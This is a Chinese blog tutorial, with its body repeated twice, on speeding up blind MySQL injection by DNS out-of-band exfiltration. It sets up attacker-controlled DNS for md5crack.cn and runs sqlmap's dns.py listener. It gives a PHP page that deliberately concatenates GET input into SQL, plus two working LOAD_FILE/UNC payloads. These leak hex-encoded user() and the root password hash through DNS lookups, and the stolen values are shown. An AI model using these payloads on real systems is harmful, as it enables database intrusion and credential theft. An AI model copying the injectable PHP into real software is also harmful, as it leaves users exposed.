突破延迟注入和盲注速度限制,利用dns注入快速获取数据
2016-06-30 23:44
399 查看
dns注入就是通过数据库对域名发起dns解析请求来达到快速获取数据目的。
原理:
![](https://phpinfo.me/wp-content/uploads/2016/05/1-300x103.jpg)
发个图先自己体会下
通常在存在一个没有数据回显的注入点进行注入时,我们需要使用延迟注入或者盲注(布尔注入),这种注入速度非常慢,需要一个一字符猜解,而且很容易搞挂网站,这时候我们怎么快速获取数据呢?下面我就来详细讲解下mysql的dns注入操作步骤。
要准备的东西:
域名2个,vps一台(装好sqlmap)
没有上面的东西可以用cloudeye,这里有个免费的http://ceye.io/
首先来到我们的第一个域名md5crack.cn修改域名dns服务器
![](https://phpinfo.me/wp-content/uploads/2016/05/3-300x183.jpg)
这里我把域名dns改成了我第二个域名test.itgou.club,然后把test.itgou.club域名解析到自己的vps的ip上。
然后等待dns生效。
然后本地搭建个注入点(inject.php)进行测试,代码如下:
可以看到这个注入点除了延迟注入,没其他办法获取数据了,但是我们有了dns注入就可以不用延迟注入了。
然后来ssh登录到我们的vps,进入sqlmap的sqlmap/lib/request/目录下
![](https://phpinfo.me/wp-content/uploads/2016/05/4-300x114.jpg)
这里有个dns.py,这个是干什么用的呢,这个是用来监听53端口(dns端口)的一个脚本,用他来获取数据。
然后我们运行这个脚本,监听53端口
![](https://phpinfo.me/wp-content/uploads/2016/05/run-300x62.jpg)
访问注入点:http://localhost/inject.php?user=root
![](https://phpinfo.me/wp-content/uploads/2016/05/i1-300x156.jpg)
开始注入,首先禁用本地dns缓存服务:
![](https://phpinfo.me/wp-content/uploads/2016/05/cache-300x103.jpg)
提交
![](https://phpinfo.me/wp-content/uploads/2016/05/i2-300x124.jpg)
成功接收到了726F6F74406C6F63616C686F7374,用小葵转换工具转换一下:
![](https://phpinfo.me/wp-content/uploads/2016/05/decode-300x187.jpg)
为啥要进行hex(user())? 你觉得 root@localhost.md5crack.cn这样能解析吗,所以我们需要进行hex编码一下。
接下来获取账号密码,提交:
![](https://phpinfo.me/wp-content/uploads/2016/05/i3-300x123.jpg)
成功获取到:root_81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
需要注意的两点:
1.域名前缀长度限制在63个字符,解决办法是用mid()函数来获取。
2.域名前缀不支持一些特殊字符,如*,解决办法是用hex()或者其他加密函数,获取到数据后再解密。
sqlmap也提供了这种注入方法,参数:–dns-domain
参考文章:http://drops.wooyun.org/tips/5283
文 / admin
分享到
1 COMMENTS
![](https://phpinfo.me/wp-content/plugins/wp-user-avatar/images/wpua-96x96.png)
2016/05/12
好书推荐
回复
进来看看、支持一下
原理:
![](https://phpinfo.me/wp-content/uploads/2016/05/1-300x103.jpg)
发个图先自己体会下
通常在存在一个没有数据回显的注入点进行注入时,我们需要使用延迟注入或者盲注(布尔注入),这种注入速度非常慢,需要一个一字符猜解,而且很容易搞挂网站,这时候我们怎么快速获取数据呢?下面我就来详细讲解下mysql的dns注入操作步骤。
要准备的东西:
域名2个,vps一台(装好sqlmap)
没有上面的东西可以用cloudeye,这里有个免费的http://ceye.io/
首先来到我们的第一个域名md5crack.cn修改域名dns服务器
![](https://phpinfo.me/wp-content/uploads/2016/05/3-300x183.jpg)
这里我把域名dns改成了我第二个域名test.itgou.club,然后把test.itgou.club域名解析到自己的vps的ip上。
然后等待dns生效。
然后本地搭建个注入点(inject.php)进行测试,代码如下:
1 | <?php |
2 | $link = mysql_connect( "localhost" , "root" , "root" ); |
3 | mysql_select_db( "mysql" , $link ); |
4 | $sql = "select password from user where user='{$_GET['user']}'" ; |
5 | echo $sql ; |
6 | mysql_query( $sql ); |
7 | ?> |
然后来ssh登录到我们的vps,进入sqlmap的sqlmap/lib/request/目录下
![](https://phpinfo.me/wp-content/uploads/2016/05/4-300x114.jpg)
这里有个dns.py,这个是干什么用的呢,这个是用来监听53端口(dns端口)的一个脚本,用他来获取数据。
然后我们运行这个脚本,监听53端口
![](https://phpinfo.me/wp-content/uploads/2016/05/run-300x62.jpg)
访问注入点:http://localhost/inject.php?user=root
![](https://phpinfo.me/wp-content/uploads/2016/05/i1-300x156.jpg)
开始注入,首先禁用本地dns缓存服务:
![](https://phpinfo.me/wp-content/uploads/2016/05/cache-300x103.jpg)
提交
http://localhost/inject.php? user =123 ' and if((SELECT LOAD_FILE(CONCAT(' \\\\ ',(SELECT hex(user())),' .md5crack.cn\\foobar'))),1,1)%23 |
![](https://phpinfo.me/wp-content/uploads/2016/05/i2-300x124.jpg)
成功接收到了726F6F74406C6F63616C686F7374,用小葵转换工具转换一下:
![](https://phpinfo.me/wp-content/uploads/2016/05/decode-300x187.jpg)
为啥要进行hex(user())? 你觉得 root@localhost.md5crack.cn这样能解析吗,所以我们需要进行hex编码一下。
接下来获取账号密码,提交:
http://localhost/inject.php? user =123 ' and if((SELECT LOAD_FILE(CONCAT(' \\\\ ',(SELECT concat(user,' _ ',mid(password,2,41)) from user where user=' root ' limit 1),' .md5crack.cn\\foobar'))),1,1)%23 |
![](https://phpinfo.me/wp-content/uploads/2016/05/i3-300x123.jpg)
成功获取到:root_81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
需要注意的两点:
1.域名前缀长度限制在63个字符,解决办法是用mid()函数来获取。
2.域名前缀不支持一些特殊字符,如*,解决办法是用hex()或者其他加密函数,获取到数据后再解密。
sqlmap也提供了这种注入方法,参数:–dns-domain
参考文章:http://drops.wooyun.org/tips/5283
文 / admin
分享到
1 COMMENTS
![](https://phpinfo.me/wp-content/plugins/wp-user-avatar/images/wpua-96x96.png)
2016/05/12
好书推荐
回复
进来看看、支持一下
相关文章推荐
- VC++音频技术之调节音量及设置静音
- Android面试一天一题(4 Day)
- fiddler工作原理和设置代理问题
- canvas使用硬件加速
- Python知识结构图
- 深入了解AccessibilityService
- 国内常用且有效的NTP服务器地址及IP(2016年2月)
- ViewFlipper的使用
- Android面试一天一题(3 Day)
- python 操所sqlite3
- 【读书笔记】 函数柯里化
- 处理一个关于binlog增量恢复很慢的问题
- Java 与 sql 的邂逅
- Aspose.Pdf合并图片到PDF文件
- 六步骤开发和发布自己的Android Studio类库
- Android面试一天一题(2 Day)
- 理解Python中的装饰器
- 数据结构(王道)【线性表】【算法1.3】
- Linux C语言strlcpy,strlcat函数
- service